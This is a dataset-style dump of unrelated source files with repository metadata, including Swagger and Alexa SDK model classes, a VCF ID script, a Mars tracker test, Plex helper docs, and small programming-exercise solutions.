def f(): g()
def g(): pass
f()
f()
Assuming the frame id for global frame is (0,). We called f two times with two
frames (0, 0) and (0, 1). f calls g, which also generates two frames (0, 0, 0) and
(0, 1, 0). By comparing prefixes, it's easy to know whether one frame is the parent
frame of the other.
We also maintain the frame id of current code location. New frame ids are generated
based on event type and current frame id.
TODO: record function name.
"""
current_ = (0,)
# Mapping from parent frame id to max child frame index.
child_index: Dict[Tuple, int] = defaultdict(int)
def __init__(self, frame_id_tuple: Tuple[int, ...], co_name: str = ""):
self._frame_id_tuple = frame_id_tuple
self.co_name = co_name
def __eq__(self, other: Union["FrameID", Tuple[int, ...]]):
if isinstance(other, FrameID):
return self._frame_id_tuple == other._frame_id_tuple
return isinstance(other, Tuple) and self._frame_id_tuple == other
def __hash__(self):
return hash(self._frame_id_tuple)
def __add__(self, other: Tuple):
return FrameID(self._frame_id_tuple + other)
@property
def tuple(self):
return self._frame_id_tuple
@classmethod
def current(cls):
return FrameID(cls.current_)
@property
def parent(self):
return FrameID(self._frame_id_tuple[:-1])
def is_child_of(self, other):
return other == self._frame_id_tuple
def is_parent_of(self, other):
return self == other._frame_id_tuple
@classmethod
def create(cls, event: str):
assert event in {"line", "call", "return"}
if event == "line":
return cls.current()
if event == "call":
frame_id = cls.current()
cls.current_ = cls.current_ + (cls.child_index[cls.current_],)
return frame_id # callsite is in caller frame.
if event == "return":
call_frame = cls.current()
cls.current_ = cls.current_[:-1]
# After exiting call frame, increments call frame's child index.
cls.child_index[cls.current_] += 1
return call_frame
def __str__(self):
"""Prints the tuple representation."""
return f"{str(self._frame_id_tuple)} {self.co_name}"
class ID(str):
"""A class that represents an identifier.
There's no need to save frame info, because at a ceratain time, a computation or
node only sees one value for one identifier, and we can omit others.
"""
| [
"laike9m@gmail.com"
] | laike9m@gmail.com |
0cc1a6763c74990c23270a72d398db34d9e14368 | c4f01eec090833762b884c2078161df087d09b0d | /Other documents/Term papers/Курсач (5 сем)/CourseWorkPolygon/venv/Lib/site-packages/pdhttp/models/wrist_button_states.py | 54f9774741221e78c328ee18e8104101b5dcb943 | [] | no_license | areyykarthik/Zhukouski_Pavel_BSU_Projects | 47a30144c5614b10af521a78fba538a0e9184efa | 3540979e680732d38e25a6b39f09338985de6743 | refs/heads/master | 2023-08-07T02:49:34.736155 | 2021-10-05T21:57:03 | 2021-10-05T21:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,076 | py | # coding: utf-8
"""
Robot API
Robot REST API # noqa: E501
OpenAPI spec version: 1.8.2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class WristButtonStates(dict):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'timestamp': 'float'
}
attribute_map = {
'timestamp': 'timestamp'
}
def __init__(self, timestamp=None): # noqa: E501
"""WristButtonStates - a model defined in Swagger""" # noqa: E501
self._timestamp = None
self.discriminator = None
if timestamp is not None:
self.timestamp = timestamp
@property
def timestamp(self):
"""Gets the timestamp of this WristButtonStates. # noqa: E501
:return: The timestamp of this WristButtonStates. # noqa: E501
:rtype: float
"""
return self._timestamp
@timestamp.setter
def timestamp(self, timestamp):
"""Sets the timestamp of this WristButtonStates.
:param timestamp: The timestamp of this WristButtonStates. # noqa: E501
:type: float
"""
self._timestamp = timestamp
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WristButtonStates, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WristButtonStates):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"shist.pupust@mail.ru"
] | shist.pupust@mail.ru |
b432bf69f1eae4c948cc8044b5e361f046760d5a | 054bc8696bdd429e2b3ba706feb72c0fb604047f | /python/vcf/VCFSetID/VCFSetID.py | e2d14da422c7239b968475a01174e89a00f78923 | [] | no_license | wavefancy/WallaceBroad | 076ea9257cec8a3e1c8f53151ccfc7c5c0d7200f | fbd00e6f60e54140ed5b4e470a8bdd5edeffae21 | refs/heads/master | 2022-02-22T04:56:49.943595 | 2022-02-05T12:15:23 | 2022-02-05T12:15:23 | 116,978,485 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #!/usr/bin/env python3
"""
Set/Replace ID for VCF file. setID as : chr:pos:ref:alt
@Author: wavefancy@gmail.com
Usage:
VCFSetID.py [-i] [-s] [-m int]
VCFSetID.py -h | --help | -v | --version | -f | --format
Notes:
1. Read vcf file from stdin, setID as : chr:pos:ref:alt.
3. Output results to stdout.
Options:
-i Include old rsID.
-s Sort the ref and alt alleles, sorted([ref,alt])
-m int Set the maxmium ID lenght as int.
-h --help Show this screen.
-v --version Show version.
-f --format Show format example.
"""
import sys
from docopt import docopt
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
def ShowFormat():
'''Input File format example:'''
print('''
input vcf example(abstracted):
----------------------
chr2 13649 . G C
out vcf example:
----------------------
chr2 13649 chr2:13649:G:C G C
''');
if __name__ == '__main__':
args = docopt(__doc__, version='1.0')
#print(args)
if(args['--format']):
ShowFormat()
sys.exit(-1)
IncludeOld = False
if args['-i']:
IncludeOld = True
MAX_ID_LEN = int(args['-m']) if args['-m'] else -1
# infile.close()
output = False
for line in sys.stdin:
line = line.strip()
if line:
if output:
#output results.
ss = line.split(None, maxsplit=7)
# check if need to sort ref, alt alleles.
stemp = sorted(ss[3:5]) if args['-s'] else ss[3:5]
if IncludeOld:
ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1] + ':' + ss[2]
else:
ss[2] = ss[0] + ':' + ss[1] + ':' + stemp[0] + ':' + stemp[1]
if MAX_ID_LEN > 0:
ss[2] = ss[2][0:MAX_ID_LEN]
sys.stdout.write('%s\n'%('\t'.join(ss)))
#sys.stdout.write('%s\n'%('\t'.join([ss[x] for x in idIndex])))
else:
if line.startswith('##'):
sys.stdout.write('%s\n'%(line))
elif line.startswith('#C') or line.startswith('#c'):
output = True
sys.stdout.write('%s\n'%(line))
sys.stdout.close()
sys.stderr.flush()
sys.stderr.close()
| [
"wavefancy@gmail.com"
] | wavefancy@gmail.com |
fae7eca82ace71668d57d4156e436c6965ab22b9 | 132b261b16338cb7b9297bd04eaaaafe34bde89e | /sendSMSSkillLambda/package/ask_sdk_model/interfaces/audioplayer/error.py | 0c4c22d8473612ca7097a846067b1f065118c3e7 | [
"Apache-2.0"
] | permissive | ziniman/aws-alexa-lambda-workshop | 2835b998272b01856d3dbea6481e9ee4457da2f2 | d1e291ebd3e20132098541c92735d29491bfc932 | refs/heads/master | 2020-06-25T22:58:04.814822 | 2019-09-08T10:37:00 | 2019-09-08T10:37:00 | 199,446,036 | 0 | 3 | Apache-2.0 | 2019-09-05T09:03:12 | 2019-07-29T12:11:58 | Python | UTF-8 | Python | false | false | 3,562 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.interfaces.audioplayer.error_type import ErrorType
class Error(object):
"""
:param message:
:type message: (optional) str
:param object_type:
:type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType
"""
deserialized_types = {
'message': 'str',
'object_type': 'ask_sdk_model.interfaces.audioplayer.error_type.ErrorType'
} # type: Dict
attribute_map = {
'message': 'message',
'object_type': 'type'
} # type: Dict
def __init__(self, message=None, object_type=None):
# type: (Optional[str], Optional[ErrorType]) -> None
"""
:param message:
:type message: (optional) str
:param object_type:
:type object_type: (optional) ask_sdk_model.interfaces.audioplayer.error_type.ErrorType
"""
self.__discriminator_value = None # type: str
self.message = message
self.object_type = object_type
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, Error):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| [
"oritalul@amazon.com"
] | oritalul@amazon.com |
873ef77356637ce0e4537e113fbf9e125a3bb52c | a3597afc5aaf15723dba35d5b114f2b3e129a168 | /mars/services/lifecycle/supervisor/tests/test_tracker.py | df62277ac9f2722e4ab8cefc3bfe49accb92f48e | [
"BSD-3-Clause",
"CC0-1.0",
"ISC",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"MIT"
] | permissive | hekaisheng/mars | 5edff06194779d6005bd768dabadd9191c812cb3 | 49ce0c1c691d405040e53b8eb8d8af9b7e87ae55 | refs/heads/master | 2023-01-10T06:24:05.532213 | 2021-12-07T08:21:56 | 2021-12-07T08:21:56 | 160,764,275 | 0 | 2 | Apache-2.0 | 2021-01-10T08:43:43 | 2018-12-07T03:12:41 | Python | UTF-8 | Python | false | false | 3,052 | py | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pytest
from ..... import oscar as mo
from ..... import tensor as mt
from .....core import tile
from ....cluster import MockClusterAPI
from ....meta import MockMetaAPI
from ....session import MockSessionAPI
from ....storage import MockStorageAPI, DataNotExist
from ... import TileableNotTracked
from ...supervisor.tracker import LifecycleTrackerActor
@pytest.mark.asyncio
async def test_tracker():
pool = await mo.create_actor_pool("127.0.0.1", n_process=0)
async with pool:
addr = pool.external_address
session_id = "test_session"
await MockClusterAPI.create(addr)
await MockSessionAPI.create(addr, session_id=session_id)
meta_api = await MockMetaAPI.create(session_id, addr)
storage_api = await MockStorageAPI.create(session_id, addr)
try:
tracker = await mo.create_actor(
LifecycleTrackerActor,
session_id,
uid=LifecycleTrackerActor.gen_uid(session_id),
address=pool.external_address,
)
t = mt.random.rand(15, 5, chunk_size=5)
t = tile(t)
tileable_key = t.key
chunk_keys = []
for c in t.chunks:
chunk_keys.append(c.key)
await meta_api.set_chunk_meta(c, bands=[(addr, "numa-0")])
await storage_api.put(c.key, np.random.rand(5, 5))
await tracker.track(tileable_key, chunk_keys)
await tracker.incref_tileables([tileable_key])
await tracker.incref_chunks(chunk_keys[:2])
await tracker.decref_chunks(chunk_keys[:2])
await tracker.decref_tileables([tileable_key])
assert len(await tracker.get_all_chunk_ref_counts()) == 0
for chunk_key in chunk_keys:
with pytest.raises(KeyError):
await meta_api.get_chunk_meta(chunk_key)
for chunk_key in chunk_keys:
with pytest.raises(DataNotExist):
await storage_api.get(chunk_key)
with pytest.raises(TileableNotTracked):
await tracker.incref_tileables(["not_tracked"])
with pytest.raises(TileableNotTracked):
await tracker.decref_tileables(["not_tracked"])
finally:
await MockStorageAPI.cleanup(pool.external_address)
await MockClusterAPI.cleanup(pool.external_address)
| [
"noreply@github.com"
] | hekaisheng.noreply@github.com |
4600df2a769dabba26bb553fe5ece02566fc38c3 | 5598fe9705c7066407ee02245ae5f98f3fec3a54 | /utils.py | 309482bf5635e5221ceec060f59ecba73c132a36 | [] | no_license | EgorLakomkin/TopCoderSpokenLanguageRecognition | 8d2bb1608cc6d4eaf25d4bc43c48ce9e7f68bb4a | 73df1b4742a71fb825d78e7f15f3a2a54339d4ef | refs/heads/master | 2021-01-10T17:10:34.030434 | 2015-11-14T11:03:47 | 2015-11-14T11:03:47 | 46,171,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,253 | py | import os
from subprocess import check_call
from path import Path
import librosa
from cPickle import Pickler, Unpickler
import cPickle
from multiprocessing import Pool
import numpy as np
from features_storage import FeatureStorage
DATA_DIR = './data'
FEATURE_STORAGE = 'features_storage'
TRAINING_FILE = os.path.join(DATA_DIR, 'trainingset.csv')
TESTING_FILE = os.path.join(DATA_DIR, 'testingset.csv' )
FILES_DIR = os.path.join( DATA_DIR, 'data' )
def load_classes_info():
classes_dict, revert_classes_dict = {}, {}
class_idx = 0
for line in open(TRAINING_FILE):
_, language_class_name = line.strip().split(',')
if language_class_name not in classes_dict:
classes_dict[ language_class_name ] = class_idx
revert_classes_dict[ class_idx ] = language_class_name
class_idx += 1
return classes_dict, revert_classes_dict
def get_mfcc(signal, n_fft = 4096, hop_length = 1024, sr=44100, n_mfcc=20, logscaled=True):
"""Computes the mel-frequency cepstral coefficients of a signal
ARGS
signal: audio signal <number array>
n_fft: FFT size <int>
hop_length : hop length <int>
sr: sampling rate <int>
n_mfcc: number of MFC coefficients <int>
logscaled: log-scale the magnitudes of the spectrogram <bool>
RETURN
mfcc: mel-frequency cepstral coefficients <number numpy array>
"""
S = librosa.feature.melspectrogram(signal, sr=sr, n_fft=n_fft, hop_length=hop_length)
if logscaled:
log_S = librosa.logamplitude(S)
mfcc = librosa.feature.mfcc(S=log_S, n_mfcc=n_mfcc)
return mfcc
def load_test_features(test_filename, feature_func, limit = None):
pool = Pool()
test_data = get_all_test_data()
if limit:
test_data = test_data[:limit]
feature_storage = FeatureStorage( name = test_filename, base_dir = FEATURE_STORAGE )
if not feature_storage.exists():
print "Loading test from scratch"
for_features = [ (path, None) for (path, filename ) in test_data ]
X_test_transformed = pool.map( feature_func, for_features )
print "Dumping test features"
feature_storage.save( X_test_transformed )
print "Finished dumping"
else:
print "Loading test from cache"
X_test_transformed = feature_storage.load()
pool.close()
pool.terminate()
return X_test_transformed
def shuffle_in_unison_inplace(a, b):
assert a.shape[0] == b.shape[0]
p = np.random.permutation(a.shape[0])
return a[p], b[p]
def load_train_features( train_filename, feature_func, limit = None ):
feature_storage = FeatureStorage( name = train_filename, base_dir = FEATURE_STORAGE )
if not feature_storage.exists( ):
all_train_data = return_all_train_files()
if limit is not None:
all_train_data = all_train_data[:limit]
print "Started processing train"
pool = Pool()
X_train_transformed = pool.map( feature_func, all_train_data )
pool.close()
pool.terminate()
print "Dumping train features"
feature_storage.save( X_train_transformed )
else:
print "Loading train from cache"
X_train_transformed = feature_storage.load()
return X_train_transformed
def convert_to_wav(dir):
train_dir = Path( dir )
for f in train_dir.walkfiles('*.mp3'):
name = f.name.replace('.mp3', '') + '.wav'
check_call(['avconv', '-ar', '44100', '-i', str(f), os.path.abspath( os.path.join( dir, name ) )])
def get_all_test_data():
res = []
for line in open(TESTING_FILE):
filename = line.strip()
full_path = os.path.join(FILES_DIR, filename.replace('.mp3', '.wav'))
res.append( (full_path, filename) )
return res
def return_all_train_files():
all_train_data = []
classes_dict, _ = load_classes_info()
for line in open(TRAINING_FILE):
filename, language_class_name = line.strip().split(',')
filename = os.path.join(FILES_DIR, filename.replace('.mp3', '.wav'))
language_class = classes_dict[ language_class_name ]
all_train_data.append( (filename, language_class) )
return all_train_data
if __name__ == "__main__":
convert_to_wav('./data')
| [
"you@example.com"
] | you@example.com |
ff2417be8026f879c74193c9a68d160b8a26196d | c8a04384030c3af88a8e16de4cedc4ef8aebfae5 | /stubs/pandas/tests/frame/test_asof.pyi | cf6de5856ad19886ade3d96fdb920a6514d14236 | [
"MIT"
] | permissive | Accern/accern-xyme | f61fce4b426262b4f67c722e563bb4297cfc4235 | 6ed6c52671d02745efabe7e6b8bdf0ad21f8762c | refs/heads/master | 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 | MIT | 2023-07-19T02:13:18 | 2019-12-09T20:21:59 | Python | UTF-8 | Python | false | false | 718 | pyi | # Stubs for pandas.tests.frame.test_asof (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level
from typing import Any
def date_range_frame() -> Any:
...
class TestFrameAsof:
def test_basic(self, date_range_frame: Any) -> None:
...
def test_subset(self, date_range_frame: Any) -> None:
...
def test_missing(self, date_range_frame: Any) -> None:
...
def test_all_nans(self, date_range_frame: Any) -> None:
...
def test_time_zone_aware_index(self, stamp: Any, expected: Any) -> None:
...
| [
"josua.krause@gmail.com"
] | josua.krause@gmail.com |
2e908b9f14dad212166d5d26c5846a4014df8854 | 750d8ade6abc2b3bd6a24e660a4992114db6ac0c | /lib/music/plex/__init__.py | 6b0e02e3511aa7df7bc5c68e754877876aaa33c2 | [] | no_license | dskrypa/music_manager | 8a00a4bd7b32a87dab2441614c94346fa87c4f13 | ad7265fbd203962a4bf9cf6444c8e10d561a307c | refs/heads/main | 2023-08-09T06:26:46.592118 | 2023-08-08T11:38:08 | 2023-08-08T11:38:08 | 234,730,172 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,016 | py | """
Package for working with the Plex API, and for syncing Plex ratings with ratings stored in ID3 tags.
Note on fetchItems:
The kwargs to fetchItem/fetchItems use __ to access nested attributes, but the only nested attributes available are
those that are returned in the items in ``plex.server.query(plex._ekey(search_type))``, not the higher level objects.
Example available attributes::\n
>>> data = plex.server.query(plex._ekey('track'))
>>> media = [c for c in data[0]]
>>> for m in media:
... m
... m.attrib
... print(', '.join(sorted(m.attrib)))
... for part in m:
... part
... part.attrib
... print(', '.join(sorted(part.attrib)))
...
<Element 'Media' at 0x000001E4E3971458>
{'id': '76273', 'duration': '238680', 'bitrate': '320', 'audioChannels': '2', 'audioCodec': 'mp3', 'container': 'mp3'}
audioChannels, audioCodec, bitrate, container, duration, id
<Element 'Part' at 0x000001E4E48D9458>
{'id': '76387', 'key': '/library/parts/76387/1555183134/file.mp3', 'duration': '238680', 'file': '/path/to/song.mp3', 'size': '9773247', 'container': 'mp3', 'hasThumbnail': '1'}
container, duration, file, hasThumbnail, id, key, size
>>> data = plex.server.query(plex._ekey('album'))
>>> data[0]
<Element 'Directory' at 0x000001E4E3C92458>
>>> print(', '.join(sorted(data[0].attrib.keys())))
addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey, parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
>>> elements = [c for c in data[0]]
>>> for e in elements:
... e
... e.attrib
... for sub_ele in e:
... sub_ele
... sub_ele.attrib
...
<Element 'Genre' at 0x000001E4E3C929F8>
{'tag': 'K-pop'}
Example playlist syncs::\n
>>> plex.sync_playlist('K-Pop 3+ Stars', userRating__gte=6, genre__like='[kj]-?pop')
2019-06-01 08:53:39 EDT INFO __main__ 178 Creating playlist K-Pop 3+ Stars with 485 tracks
>>> plex.sync_playlist('K-Pop 4+ Stars', userRating__gte=8, genre__like='[kj]-?pop')
2019-06-01 08:54:13 EDT INFO __main__ 178 Creating playlist K-Pop 4+ Stars with 257 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:22 EDT INFO __main__ 178 Creating playlist K-Pop 5 Stars with 78 tracks
>>> plex.sync_playlist('K-Pop 5 Stars', userRating__gte=10, genre__like='[kj]-?pop')
2019-06-01 08:54:58 EDT VERBOSE __main__ 196 Playlist K-Pop 5 Stars does not contain any tracks that should be removed
2019-06-01 08:54:58 EDT VERBOSE __main__ 208 Playlist K-Pop 5 Stars is not missing any tracks
2019-06-01 08:54:58 EDT INFO __main__ 212 Playlist K-Pop 5 Stars contains 78 tracks and is already in sync with the given criteria
Object and element attributes and elements available for searching:
- track:
- attributes: addedAt, duration, grandparentGuid, grandparentKey, grandparentRatingKey, grandparentThumb,
grandparentTitle, guid, index, key, originalTitle, parentGuid, parentIndex, parentKey, parentRatingKey,
parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt
- elements: media
- album:
- attributes: addedAt, guid, index, key, loudnessAnalysisVersion, originallyAvailableAt, parentGuid, parentKey,
parentRatingKey, parentThumb, parentTitle, ratingKey, summary, thumb, title, type, updatedAt, year
- elements: genre
- artist:
- attributes: addedAt, guid, index, key, lastViewedAt, ratingKey, summary, thumb, title, type, updatedAt,
userRating, viewCount
- elements: genre
- media:
- attributes: audioChannels, audioCodec, bitrate, container, duration, id
- elements: part
- genre:
- attributes: tag
- part:
- attributes: container, duration, file, hasThumbnail, id, key, size
:author: Doug Skrypa
"""
from .server import LocalPlexServer
| [
"dskrypa@gmail.com"
] | dskrypa@gmail.com |
12c9bc75b85fee4fddb162344fe499e27e861437 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03475/s093541910.py | fba06f3b1736933db986f94190f598cc10fff7bf | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | N=int(input())
l=[0]*N
for i in range(N-1):
c,s,f=map(int,input().split())
l[i]=c+s
for j in range(i):
l[j]=max(l[j],s,-(-l[j]//f)*f)+c
for i in l:print(i) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b201b0ea2d5386b9e8b4dafdfd2fcb3d93cd1298 | b665fe52aceca20944f5c7dfc74688370e514666 | /dbaas/workflow/steps/redis/resize/__init__.py | 5dca9388a256f4780a11cbdaff1ff49171827266 | [] | no_license | tsunli/database-as-a-service | 5e68ee22b1b46d30c6d83278407494971097d451 | 73573d495f62829259f656dfa0b642b9be4f2ead | refs/heads/master | 2021-01-24T15:06:42.029936 | 2015-07-02T21:42:44 | 2015-07-02T21:42:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | # -*- coding: utf-8 -*-
import logging
from dbaas_cloudstack.models import HostAttr
from util import exec_remote_command
from workflow.exceptions.error_codes import DBAAS_0015
from util import full_stack
from util import build_context_script
LOG = logging.getLogger(__name__)
def run_vm_script(workflow_dict, context_dict, script):
try:
instances_detail = workflow_dict['instances_detail']
final_context_dict = dict(context_dict.items() + workflow_dict['initial_context_dict'].items())
for instance_detail in instances_detail:
instance = instance_detail['instance']
host = instance.hostname
host_csattr = HostAttr.objects.get(host=host)
final_context_dict['HOSTADDRESS'] = instance.address
final_context_dict['PORT'] = instance.port
command = build_context_script(final_context_dict, script)
output = {}
return_code = exec_remote_command(server = host.address,
username = host_csattr.vm_user,
password = host_csattr.vm_password,
command = command,
output = output)
if return_code:
raise Exception, "Could not run script. Output: {}".format(output)
return True
except Exception:
traceback = full_stack()
workflow_dict['exceptions']['error_codes'].append(DBAAS_0015)
workflow_dict['exceptions']['traceback'].append(traceback)
return False
| [
"raposo.felippe@gmail.com"
] | raposo.felippe@gmail.com |
d26831364d5626bb2c597b32de481c75ecd14631 | 29a435f155f6b49b97e41241ef01274a15e9b407 | /collective/packagekit/browser/util_view.py | 314997a577dbc4bf2c679f3769306bb1a9686ce2 | [] | no_license | kagesenshi/collective.packagekit | b55d1763bf97e884b89c9eb8f9b51c497f8ad80b | 1fcefc10f1bf71b60dd671dff4783dc390c87e63 | refs/heads/master | 2020-06-03T18:02:22.124810 | 2011-12-29T14:18:44 | 2011-12-29T14:18:44 | 3,011,085 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,146 | py | from five import grok
from collective.packagekit.pkappbehavior import IPackageKitApplicationBehavior
from zope.interface import Interface
from itertools import izip
grok.templatedir('templates')
from zope.security import checkPermission
class PKAppUtilView(grok.View):
grok.name('pkapp_util')
grok.context(IPackageKitApplicationBehavior)
def render(self):
return str(self)
def gridslice(self, items, size=5):
l = items
n = size
# http://taylanpince.com/blog/posts/slicing-a-list-into-equal-groups-in-python/
return [s for s in izip(*[iter(l)] * n)] + [l[len(l) - (len(l) % n):]]
def fedora_packages(self):
pkgs = [i['identifier'] for i in self.context.pk_packages if (
i['distribution'] == 'fedora')]
return set(pkgs)
def images(self):
return self.context.portal_catalog(
path={
'query': '/'.join(self.context.getPhysicalPath()),
'depth': 1
},
portal_type='Image'
)
def can_add(self):
return checkPermission('cmf.AddPortalContent', self.context)
| [
"izhar@inigo-tech.com"
] | izhar@inigo-tech.com |
bed7e0c91fb9452819a192221524a55e26a1d1c1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2189/60795/256420.py | 444dea8a9fbb5a06c9caaf11ecf79c4b1dc786bf | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | def test(num):
num = int(num)
at = 0
th, hu, de, fa = 0, 0, 0, 0
if num > 10 & num < 100:
fa = num % 10
de = (num - fa) / 10
at = de * de + fa * fa
elif num > 100 & num < 1000:
hu = num / 100
de = num % 100 / 10
fa = num % 100 % 10
at = hu * hu + de * de + fa * fa
elif num > 1000:
th = num / 1000
hu = num % 1000 / 100
de = num % 1000 % 100 / 10
fa = num % 1000 % 100 % 10
at = th * th + hu * hu + de * de + fa * fa
else:
at = -1
return at
T=int(input())
for i in range(0,T):
borad=input()
num=int(input())
p=True
number=0
while p:
num=number+num
sum = test(num)
ttt = 0
if sum == -1:
p=False
else:
for i in range(0, 10):
sum = test(sum)
sum = int(sum)
if sum == 100:
ttt = 1
break
elif sum == 1:
ttt = 1
break
elif sum == 10:
ttt = 1
break
elif sum == 1000:
ttt = 1
break
if ttt == 1:
p=True
print(num)
number=number+1 | [
"1069583789@qq.com"
] | 1069583789@qq.com |
1c5fedb67468760e5c3073345d8d2eb82b9228ea | 050ccac41c3b3b217204eb5871ca987f897b8d56 | /tradeorsale/apps/item/events.py | 0cef9d23f7d18247f34355e0ff52e24a94de8e5d | [] | no_license | marconi/tradeorsale | 6aefc7760f389aabd7e08fe40953914f5ea60abc | 6750260734f77cbf60c19ddddc83ebd27a5fb3a9 | refs/heads/master | 2021-01-23T20:21:24.210074 | 2013-01-12T09:05:09 | 2013-01-12T09:05:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,524 | py | # # -*- coding: utf-8 -*-
# import logging
# from cornice import Service
# from sqlalchemy.orm.exc import NoResultFound
# from pyramid.i18n import TranslationString as _
# from tradeorsale.apps.item.models import Item
# from tradeorsale.libs.models import DBSession
# logger = logging.getLogger('tradeorsale')
# json_header = {'Content-Type': 'application/json'}
# event_service = Service(name='item_events', path='/items/events')
# VALID_ACTIONS = ('comment.created',)
# def validate_action(request):
# action = request.POST.get('action', None)
# if not action or action not in VALID_ACTIONS:
# request.errors.add('body', 'action', _(u'Invalid action'))
# def validate_item(request):
# try:
# item_id = int(request.POST.get('item_id', 0))
# try:
# DBSession.query(Item).filter_by(id=item_id).one()
# except NoResultFound:
# request.errors.add('body', 'item_id', _(u"Item doesn't exist"))
# except ValueError:
# request.errors.add('body', 'item_id', _(u'Invalid Item ID'))
# @event_service.post(validators=(validate_action, validate_item))
# def item_event_post(request):
# item_id = request.POST['item_id']
# action = request.POST['action']
# redis = request.registry.redis
# if action == 'comment.created':
# if not redis.hget('comments:counter', item_id):
# redis.hset('comments:counter', item_id, 1)
# else:
# redis.hincrby('comments:counter', item_id)
# return True
| [
"caketoad@gmail.com"
] | caketoad@gmail.com |
